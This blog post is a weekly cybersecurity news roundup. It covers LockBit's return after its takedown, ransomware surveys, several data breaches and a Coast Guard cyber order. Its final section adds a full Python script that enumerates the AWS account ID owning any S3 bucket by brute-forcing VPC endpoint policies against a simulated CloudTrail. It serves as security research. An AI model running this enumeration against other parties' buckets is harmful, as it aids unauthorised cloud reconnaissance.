Blog

This Week in Cybersecurity News – 2/26/24 – Lockbit ?.0 Edition


  • Nathan Burke

Research and surveys

Report: Manufacturing bears the brunt of industrial ransomware

By Christian Vasquez – Cyberscoop

The ransomware variant LockBit is responsible for 25% of ransomware incidents affecting industrial systems tracked by cybersecurity firm Dragos.

Manufacturing continues to be the industrial sector hardest hit by ransomware, according to a new report by industrial cybersecurity firm Dragos.

The firm’s year-in-review reported more than 900 ransomware incidents hitting industrial organizations last year, a dramatic increase compared to 2022. Industrial organizations are often targeted both because of lax defenses and the significant costs incurred by any impact to operations — making the sector a ripe target for digital extortion.

“We saw about a 50% increase for the previous year in the number of ransomware attacks on industrial organizations,” Robert M. Lee, the CEO and founder of Dragos, told reporters ahead of the report’s release.

The vast majority of those incidents were in the manufacturing sector. Out of 905 ransomware incidents Dragos tracked, 638, or 70%, affected the manufacturing sector.


New Cybereason ‘True Cost to Business Study 2024’ Reveals it Still Doesn’t Pay to Pay

IT Security Gurus

Cybereason has today announced the results of their third annual ransomware study, commissioned to better understand the true impact of ransomware to businesses. This global study reveals ransomware attacks are becoming more frequent, effective, and sophisticated:

  • 56 percent of organisations surveyed suffered more than one ransomware attack in the last 24 months.
  • It still ‘doesn’t pay to pay’ as almost 80 percent of organisations who paid the ransom were hit a second time
  • 82 percent were hit again within a year
  • 63 percent were asked to pay again

The report ‘Ransomware: The True Cost to Business 2024’ further revealed that of the organisations who opted to pay a ransom in return for their encrypted systems, only 47 percent received their data and solutions back uncorrupted. These findings emphasize why it does not pay to pay ransomware attackers, and organisations should instead focus on detection and prevention tactics to end ransomware attacks before material damage occurs.

Lockbit Is So Hot Right Now

Reports of Lockbit’s demise have been overstated, apparently, as they’re all over the news today after they resurfaced following last week’s takedown.

LockBit Ransomware Gang Resurfaces With New Site

by Ionut Arghire – SecurityWeek

The LockBit ransomware operators announce a new leak site as they try to restore credibility after law enforcement takedown.

The LockBit ransomware operators launched a new leak site over the weekend, claiming they restored their infrastructure following a law enforcement takedown and invited affiliates to re-join the operation.

On February 19, LockBit was severely disrupted by law enforcement in North America, Europe, and Asia, which seized 34 servers, took over the group’s Tor-based leak sites, froze cryptocurrency accounts, and harvested technical information on the RaaS.

Authorities also announced that they obtained 1,000 decryption keys that will help victim organizations to recover their data without paying a ransom, and that two individuals suspected of being involved in the operation were arrested.

Shortly after, the US government announced a $10 million reward for information on LockBit leaders and a $5 million reward for information on affiliates, along with charges and sanctions against two Russian nationals believed to be associated with LockBit.

Authorities said they gained “unprecedented and comprehensive access to LockBit’s systems” and, to taunt the operators, they replaced existing posts on the seized leak site with messages containing reports on the group’s activities, information on arrests, details on rewards and sanctions, and even suggesting they know who the LockBit leader is and that he “has engaged with law enforcement”.

Over the weekend, an individual involved with the RaaS, who uses the moniker of “LockBitSupp”, launched a new leak site that lists hundreds of victim organizations and which contains a long message providing his view on the takedown.

According to LockBitSupp, a PHP flaw led to the seizure of the vulnerable sites, but not of those not running the scripting language. In fact, some of the group’s known mirror sites are now linking to the new portal.


LockBit ransomware returns, restores servers after police disruption

By Ionut Ilascu BleepingComputer

The LockBit gang is relaunching its ransomware operation on a new infrastructure less than a week after law enforcement hacked their servers, and is threatening to focus more of their attacks on the government sector.

In a message under a mock-up FBI leak – specifically to draw attention, the gang published a lengthy message about their negligence enabling the breach and the plans for the operation going forward.

LockBit ransomware continues attacks

On February 19, authorities took down LockBit’s infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel.

Five days later, LockBit is back and provides details about the breach and how they’re going to run the business to make their infrastructure more difficult to hack.

Immediately after the takedown, the gang confirmed the breach saying that they lost only the servers running PHP and that backup systems without PHP were untouched.

On Saturday, LockBit announced it was resuming the ransomware business and released damage control communication admitting that “personal negligence and irresponsibility” led to law enforcement disrupting its activity in Operation Cronos.

The gang kept the brand name and moved its data leak site to a new .onion address that lists five victims with countdown timers for publishing stolen information.

Outdated PHP server

LockBit says that law enforcement, to which they refer collectively as the FBI, breached two main servers “because for 5 years of swimming in money I became very lazy.”

“Due to my personal negligence and irresponsibility I relaxed and did not update PHP in time.” The threat actor says that the victim’s admin and chat panels server and the blog server were running PHP 8.1.2 and were likely hacked using a critical vulnerability tracked as CVE-2023-3824.

LockBit says they updated the PHP server and announced that they would reward anyone who finds a vulnerability in the latest version.

Speculating on the reason “the FBI” hacked their infrastructure, the cybercriminal says that it was because of the ransomware attack on Fulton County in January, which posed the risk of leaking information with “a lot of interesting things and Donald Trump’s court cases that could affect the upcoming US election.”

Read the Full Story Here…..


FBI’s LockBit Takedown Postponed a Ticking Time Bomb in Fulton County, Ga.

By Brian Krebs – Krebs on Security

The FBI’s takedown of the LockBit ransomware group last week came as LockBit was preparing to release sensitive data stolen from government computer systems in Fulton County, Ga. But LockBit is now regrouping, and the gang says it will publish the stolen Fulton County data on March 2 unless paid a ransom. LockBit claims the cache includes documents tied to the county’s ongoing criminal prosecution of former President Trump, but court watchers say teaser documents published by the crime gang suggest a total leak of the Fulton County data could put lives at risk and jeopardize a number of other criminal trials.

A new LockBit website listing a countdown timer until the promised release of data stolen from Fulton County, Ga.

In early February, Fulton County leaders acknowledged they were responding to an intrusion that caused disruptions for its phone, email and billing systems, as well as a range of county services, including court systems.

On Feb. 13, the LockBit ransomware group posted on its victim shaming blog a new entry for Fulton County, featuring a countdown timer saying the group would publish the data on Feb. 16 unless county leaders agreed to negotiate a ransom.

“We will demonstrate how local structures negligently handled information protection,” LockBit warned. “We will reveal lists of individuals responsible for confidentiality. Documents marked as confidential will be made publicly available. We will show documents related to access to the state citizens’ personal data. We aim to give maximum publicity to this situation; the documents will be of interest to many. Conscientious residents will bring order.”

Yet on Feb. 16, the entry for Fulton County was removed from LockBit’s site without explanation. This usually only happens after the victim in question agrees to pay a ransom demand and/or enters into negotiations with their extortionists.

However, Fulton County Commission Chairman Robb Pitts said the board decided it “could not in good conscience use Fulton County taxpayer funds to make a payment.”

“We did not pay nor did anyone pay on our behalf,” Pitts said at an incident briefing on Feb. 20.

Just hours before that press conference, LockBit’s various websites were seized by the FBI and the U.K.’s National Crime Agency (NCA), which replaced the ransomware group’s homepage with a seizure notice and used the existing design of LockBit’s victim shaming blog to publish press releases about the law enforcement action.

Read the Full Story Here….

Breaches and hacks

U-Haul tells 67K customers that cyber-crooks drove away with their personal info

By Jessica Lyons – TheRegister

U-Haul is alerting tens of thousands of folks that miscreants used stolen credentials to break into one of its systems and access customer records that contained some personal data.

A U-Haul spokesperson told The Register that about 67,000 customers in the United States and Canada were affected, but declined to answer other questions about the security snafu.

The intrusion happened on December 5, according to letters going out this week to those affected. After investigating the break-in with the help of an outside cybersecurity firm, the moving and truck rental giant determined crooks accessed its U-Haul Dealer and Team Members system used to track reservations and view customer records.

These customers’ records contained personal information, including names, dates of birth, and driver license numbers. No financial information was stolen, according to U-Haul.

“The customer record system that was involved is not part of our payment system,” the biz said in its notification letter [PDF]. “No payment card data was involved.”

U-Haul says it hardened its security systems to help prevent future breaches. Specifically, this included changing passwords on compromised accounts and offering affected customers a free, one-year membership with Experian IdentityWorks Credit 3B.


230k Individuals Impacted by Data Breach at Australian Telco Tangerine

By Ionut Arghire – SecurityWeek

Tangerine Telecom says attackers stole the personal information of 230,000 individuals from a legacy customer database.

Australian telecommunications provider Tangerine this week announced that the personal information of 230,000 individuals was stolen in a recent cyberattack.

The incident occurred on February 18 but was not discovered until two days later. The attackers, Tangerine said, accessed a legacy customer database containing the information of roughly 230,000 current and former customer accounts.

The compromised personal information includes names, addresses, dates of birth, email addresses, mobile phone numbers, and Tangerine account numbers.

“We can confirm that no credit or debit card numbers have been compromised, as we do not store this information. No driver’s license numbers, ID documentation details, banking details or passwords have been disclosed as a result of this incident,” the company said in an incident notification.

According to Tangerine, the attackers appear to have accessed the database using the login credentials of a contractor.

To contain the incident, the telecommunications services provider revoked network and system access for the compromised account, removed access to the database, and “changed all other team usernames and passwords”.

The incident, the company said, did not impact its services, nor customer accounts, which are protected with multi-factor authentication (MFA).

Tangerine started notifying the impacted individuals on February 21, encouraging them to stay vigilant on scams and other cyber issues and to report any incident.


A Cyber Attack Hit the Royal Canadian Mounted Police

By Pierluigi Paganini – SecurityAffairs

A cyber attack hit the Royal Canadian Mounted Police (RCMP), the federal and national law enforcement agency of Canada.

The Royal Canadian Mounted Police (RCMP), the federal and national law enforcement agency of Canada, confirmed that it was the target of a cyber attack. RCMP also notified the Office of the Privacy Commissioner (OPC).

The police have launched an investigation into the cyber attack and urged its staff to stay vigilant.

“The situation is evolving quickly but at this time, there is no impact on RCMP operations and no known threat to the safety and security of Canadians,” a spokesperson for the RCMP said in a statement issued to CBC News. “While a breach of this magnitude is alarming, the quick work and mitigation strategies put in place demonstrate the significant steps the RCMP has taken to detect and prevent these types of threats.”

The RCMP said that it is not aware of any impact on foreign police and intelligence services.

The Canadian law enforcement agency did not provide details about the cyber attack.

In November 2023, the Canadian government disclosed a data breach after threat actors hacked two of its contractors.

The Canadian government declared that two of its contractors, Brookfield Global Relocation Services (BGRS) and SIRVA Worldwide Relocation & Moving Services, have been hacked, resulting in the exposure of sensitive information belonging to an undisclosed number of government employees.

Data belonging to current and former Government of Canada employees, members of the Canadian Armed Forces and Royal Canadian Mounted Police personnel have been also exposed.

See also: BleepingComputer


Insomniac Games alerts employees hit by ransomware data breach

by Sergiu Gatlan – BleepingComputer

Sony subsidiary Insomniac Games is sending data breach notification letters to employees whose personal information was stolen and leaked online following a Rhysida ransomware attack in November.

The California-based video game developer has been part of Sony Interactive Entertainment’s Worldwide Studios division (now known as PlayStation Studios) after being acquired by Sony in August 2019.

The gaming studio’s most recent project is Marvel’s Spider-Man 2, released for PlayStation 5, and is currently working on Marvel’s Wolverine for the same platform.

In December, Sony said they were investigating the Rhysida ransomware gang’s claims that they breached Insomniac Games and stole over 1.3 million files from its network.

After negotiations failed when the game studio refused to pay the $2 million ransom, Rhysida dumped 1.67 TB of documents on its dark web leak site.

“We are saddened and angered about the recent criminal cyberattack on our studio and the emotional toll it’s taken on our dev team,” the studio said in a statement published on Twitter after the leak.

“We are aware that the stolen data includes personal information belonging to our employees, former employees, and independent contractors.”

The leaked files include many ID scans and internal documents, such as contract information and licensing agreements with Marvel and Nvidia, as well as screenshots of Insomniac Games’ upcoming Wolverine game.

As claimed on Rhysida’s site, the threat actors have only leaked 98% of the files they stole from the studio after selling the rest to the highest bidder.

US Government Cybersecurity News

Biden signs executive order to give Coast Guard added authority over maritime cyber threats

By Christian Vasquez – Cyberscoop

National security officials have been sounding the alarm over a China-linked hacking group that’s been targeting critical infrastructure.

President Joe Biden issued an executive order Wednesday morning aimed at increasing the defenses of maritime ports through additional authorities to the Coast Guard and started a rulemaking process to add cyber requirements for the sector.

The executive order will give the Coast Guard the authority to respond to cybersecurity incidents while requiring the maritime sector to beef up digital defenses and to report cyber incidents to the Coast Guard. The administration will also invest over $20 billion in port infrastructure over five years.

“The continuity of their operations has a clear and direct impact on the success of our country, our economy and our national security. And that’s why the Biden administration is taking a series of actions to strengthen the cybersecurity of our nation’s ports to not just shore up our cyber defenses, but fortify our supply chains and deliver for the American people,” Anne Neuberger, deputy national security advisor for cyber and emerging technology, said during a media briefing Tuesday.

The order follows a series of warnings from U.S. national security officials over a China-linked hacking group called Volt Typhoon that has successfully targeted critical infrastructure sectors around the U.S. like the maritime sector. China has an outsized influence in U.S. ports, with companies that own almost 80% of ship-to-shore cranes — the giant cranes that load and unload shipping containers at docks.

“America’s system of ports and waterways accounts for over $5.4 trillion of our nation’s annual economic activity, and our ports serve as a gateway for over 90% of all overseas trade,” Rear Adm. Jay Vann, commander of the U.S. Coast Guard Cyber Command, said during the briefing. “Any disruption to the [maritime transportation system], whether manmade or natural, physical or in cyberspace has the potential to cause cascading impacts to our domestic or global supply chains.”

The executive order amends federal legislation to give the Coast Guard the authority to control the movement of vessels that present a cyber threat, requiring maritime facilities to shore up their defenses if they fall below a baseline standard, and inspect vessels and waterfront facilities.

The Coast Guard is also issuing a nonpublic maritime security directive that requires cranes manufactured by China to face “a number of security requirements,” Vann said. Cranes that are able to be operated remotely could potentially leave them vulnerable to hackers, Vann said. However, Neuberger noted that “rip and replace” requirements are currently not being considered by the administration.

The notice of proposed rulemaking, meanwhile, is over mandatory cybersecurity regulations and is based on the Cybersecurity and Infrastructure Security Agency’s cross-sector cybersecurity performance goals, Vann said.

However, these actions began before the recent Volt Typhoon campaign. Neuberger said that the executive order and proposed rulemaking has been in the works for almost 18 months.

See Also: TheRegister

Featured Podcast

Throwing Darts in the Dark With Microsoft Incident Response

On this week’s episode of The Microsoft Threat Intelligence Podcast, Sherrod DeGrippo is joined by Stella Aghakian and Holly Burmaster. They explore the intrigue of watching threat actors and their techniques and walk through these techniques and how they are educational and critical in threat intelligence work. They also discuss their experiences at Microsoft Ignite, insights into the cyber threat actor Octo Tempest, and personal reflections on threat intelligence and favorite threat actors. Both Stella and Holly discuss how they thrive on the uncertainty and variety of their work despite the long hours and high pressure but appreciate the supportive team environment that helps them.

In this episode you’ll learn:

  • Challenges of incident response when dealing with destructive threat actors
  • Difficulty in managing the emotional aspects of incident response
  • The unpredictability and dynamic nature of incident response work

Some questions we ask:

  • How is the workflow structured in incident response teams?
  • What traits are crucial for excelling in the high-pressure world of incident response?
  • Do the DART and MSTIC teams collaborate in incident responses?

Opinion

Security is hard because it has to be right all the time? Yeah, like everything else

By Larry Peterson – TheRegister

It takes only one bottleneck or single point of failure to ruin your week

SYSTEMS APPROACH One refrain you often hear is that security must be built in from the ground floor; that retrofitting security to an existing system is the source of design complications, or worse, outright flawed designs.

While it is the case that the early internet was largely silent on the question of security, I suspect “retrofitting” is often used pejoratively. Certainly there have been convoluted and short-sighted attempts to improve security, but the internet has also evolved to include a sound architecture for securing end-to-end communication. Focusing on stopgap mechanisms is never a good recipe for understanding the underlying principles, no matter what aspect of a system one is talking about.

Read the Full Story

Didn’t fit anywhere else

How to find the AWS Account ID of any S3 Bucket

By Sam Cox – Tracebit

In 2021 Ben Bridts published a highly inventive method for finding the AWS Account ID of a public S3 bucket.

This post describes a technique to find the Account ID of any S3 bucket (both private and public).

I’d highly recommend reading Ben’s technique first as we will re-use a lot of concepts.

S3 Bucket to AWS Account ID

Shell output can be worth a thousand words, here’s what our technique enables – finding the previously unknown AWS Account ID for the bucket bucket-alpha:

sh-5.2$ python3 find-s3-account.py bucket-alpha

VPC endpoint vpce-0e76855aadb0dafb5 policy already configured
Requesting bucket-alpha using session name 0-----------
Requesting bucket-alpha using session name 1-----------
Requesting bucket-alpha using session name 2-----------
Requesting bucket-alpha using session name 3-----------

SNIP

Requesting bucket-alpha using session name -----------7
Requesting bucket-alpha using session name -----------8
Requesting bucket-alpha using session name -----------9
Finding session names which passed the VPC endpoint in CloudTrail...
Found -----------1 for bucket-alpha in CloudTrail
Found ---------1-- for bucket-alpha in CloudTrail
Found --------9--- for bucket-alpha in CloudTrail
Found -----6------ for bucket-alpha in CloudTrail
Found --3--------- for bucket-alpha in CloudTrail
Found -2---------- for bucket-alpha in CloudTrail
Found 1----------- for bucket-alpha in CloudTrail
Found ----------0- for bucket-alpha in CloudTrail
Found -------8---- for bucket-alpha in CloudTrail
Found ------7----- for bucket-alpha in CloudTrail
Found ----5------- for bucket-alpha in CloudTrail
Found ---4-------- for bucket-alpha in CloudTrail
Bucket bucket-alpha: 123456789101

How exactly does this work?

When exploring possibilities for this technique, I started by breaking down exactly why Ben’s method works. There are three key elements which combine to make it work:

  1. The ability to apply an IAM policy to the request
    In Ben’s technique, this is achieved by applying a custom policy when assuming the role.
  2. The ability to infer whether this IAM policy permitted the request or not
    In the case of public buckets, this is quite simple. If our policy blocked the request, the request will fail with AccessDenied. Otherwise, the request will succeed as expected with requests to public buckets.
  3. The ability to apply a wildcard match on the s3:ResourceAccount condition key
    This allows us to discover the Account ID incrementally, one digit at a time, reducing the search space from trillions to hundreds.

A solution

After exploring a few different ideas, I found a solution which works. It involves using a VPC Endpoint for S3, and a difference of behaviour in CloudTrail when a request is denied by a VPC Endpoint policy.

  1. The ability to apply an IAM policy to the request
    Creating a VPC Endpoint of type “Interface” for S3 will allow us to apply an IAM policy to the request. This policy intersects with the other policies which apply to the request (e.g. the bucket policy, the IAM policy of the principal making the request etc) when the request is made through the VPC Endpoint.
  2. The ability to infer whether this IAM policy permitted the request or not
    As the target bucket is owned by a third party and is a private bucket, we’re (thankfully) going to receive an AccessDenied response, regardless of whichever policies we apply to the request. However, we can infer whether the VPC Endpoint policy blocked or permitted the request by whether it appears in our own CloudTrail logs.
    – If the request does appear in our CloudTrail logs, it was permitted by our VPC Endpoint policy but blocked as expected by the bucket policy.
    – If the request does not appear in our CloudTrail logs, it was blocked by our VPC Endpoint policy.
  3. The ability to apply a wildcard match on the s3:ResourceAccount condition key
    We can use the full power of IAM policy conditions, including StringLike wildcards and resource condition keys, in a VPC Endpoint policy, so the same basic technique will work here.
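The three elements above (a policy applied to the request, an oracle for whether that policy allowed it, and a StringLike wildcard on s3:ResourceAccount) are enough to reconstruct the whole loop. The following is an added example written for this roundup; it is not Tracebit’s find-s3-account.py and not Ben Bridts’ tool. It builds the endpoint policy, one Allow statement per (position, digit) guess, and recovers the owner’s account ID from which guesses “appear in CloudTrail”. Everything on the AWS side is simulated offline: a constructed SECRET_OWNER stands in for the unknown bucket owner, and the simulated CloudTrail reports a request exactly when the endpoint policy would have allowed it, as the post describes. The session-name encoding (`-----6------`) mirrors the tool output shown above, but pairing each guess with the caller via aws:userid is my assumption; the post does not say which condition key the real tool uses.

```python
"""Digit-by-digit recovery of an S3 bucket's owning account ID (added example).

Not Tracebit's code. AWS (the VPC endpoint, STS, CloudTrail) is simulated below;
the unknown bucket owner is a constructed value.
"""
import fnmatch
import json

ACCOUNT_ID_LEN = 12
DIGITS = "0123456789"


def iam_string_like(pattern: str, value: str) -> bool:
    """IAM StringLike semantics: '*' matches any run, '?' one character, case-sensitive."""
    return fnmatch.fnmatchcase(value, pattern)


def session_name(pos: int, digit: str) -> str:
    """Encode one (position, digit) guess as a role session name, e.g. '-----6------'."""
    return "-" * pos + digit + "-" * (ACCOUNT_ID_LEN - pos - 1)


def decode_session_name(name: str) -> tuple:
    """Inverse of session_name(): return (pos, digit)."""
    pos = next(i for i, c in enumerate(name) if c != "-")
    return pos, name[pos]


def resource_account_pattern(pos: int, digit: str) -> str:
    """StringLike pattern true only if the owner's account ID has `digit` at `pos`."""
    return "?" * pos + digit + "?" * (ACCOUNT_ID_LEN - pos - 1)


def build_endpoint_policy(bucket: str) -> dict:
    """One Allow statement per guess; 12 positions x 10 digits = 120 statements.

    Both keys in a StringLike block must match, so a statement only allows the
    request when the owner digit AND the caller's session name agree with the guess.
    Assumption: aws:userid (which ends in ':<session name>' for an assumed role)
    is used for the pairing; the post does not name the key the real tool uses.
    """
    statements = []
    for pos in range(ACCOUNT_ID_LEN):
        for digit in DIGITS:
            statements.append({
                "Sid": f"Guess{pos:02d}{digit}",
                "Effect": "Allow",
                "Principal": "*",
                "Action": "s3:GetObject",
                "Resource": f"arn:aws:s3:::{bucket}/*",
                "Condition": {"StringLike": {
                    "s3:ResourceAccount": resource_account_pattern(pos, digit),
                    "aws:userid": f"*:{session_name(pos, digit)}",
                }},
            })
    return {"Version": "2012-10-17", "Statement": statements}


def endpoint_policy_allows(policy: dict, resource_account: str, userid: str) -> bool:
    """Evaluate the endpoint policy for these two keys: any matching Allow permits."""
    for stmt in policy["Statement"]:
        cond = stmt["Condition"]["StringLike"]
        if (iam_string_like(cond["s3:ResourceAccount"], resource_account)
                and iam_string_like(cond["aws:userid"], userid)):
            return True
    return False


def simulated_cloudtrail(policy: dict, bucket_owner: str, names: list) -> set:
    """Constructed oracle: which session names show up in *our* CloudTrail.

    A request denied by the endpoint policy never reaches S3 and is not logged;
    one that passes is logged even though the foreign bucket policy then denies it.
    """
    return {n for n in names
            if endpoint_policy_allows(policy, bucket_owner, f"AROAEXAMPLEROLEID:{n}")}


def recover_account_id(bucket: str, cloudtrail_lookup) -> str:
    """Issue all 120 guesses, then assemble the account ID from the logged ones."""
    policy = build_endpoint_policy(bucket)
    guesses = [session_name(p, d) for p in range(ACCOUNT_ID_LEN) for d in DIGITS]
    logged = cloudtrail_lookup(policy, guesses)

    digits = [None] * ACCOUNT_ID_LEN
    for name in logged:
        pos, digit = decode_session_name(name)
        if digits[pos] is not None and digits[pos] != digit:
            raise RuntimeError(f"conflicting guesses at position {pos}")
        digits[pos] = digit
    if None in digits:
        missing = [i for i, d in enumerate(digits) if d is None]
        raise RuntimeError(f"no logged request for positions {missing}")
    return "".join(digits)


if __name__ == "__main__":
    SECRET_OWNER = "123456789101"  # constructed; matches the value in the output above
    print(json.dumps(build_endpoint_policy("bucket-alpha")["Statement"][56], indent=2))
    found = recover_account_id(
        "bucket-alpha",
        lambda policy, names: simulated_cloudtrail(policy, SECRET_OWNER, names))
    print(f"Bucket bucket-alpha: {found}")
```

Against real AWS the lookup callback would assume a role once per session name, make the GetObject through an S3 interface endpoint, and then query CloudTrail (which lags by minutes, hence the “Finding session names which passed the VPC endpoint in CloudTrail...” step in the tool output). Note also that the search only works because the denial is observed on the caller’s own side; the bucket owner sees at most twelve AccessDenied events. Endpoint policies have a size limit, so a production tool may have to split the 120 statements across several policy updates.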

Read the Full Story Here
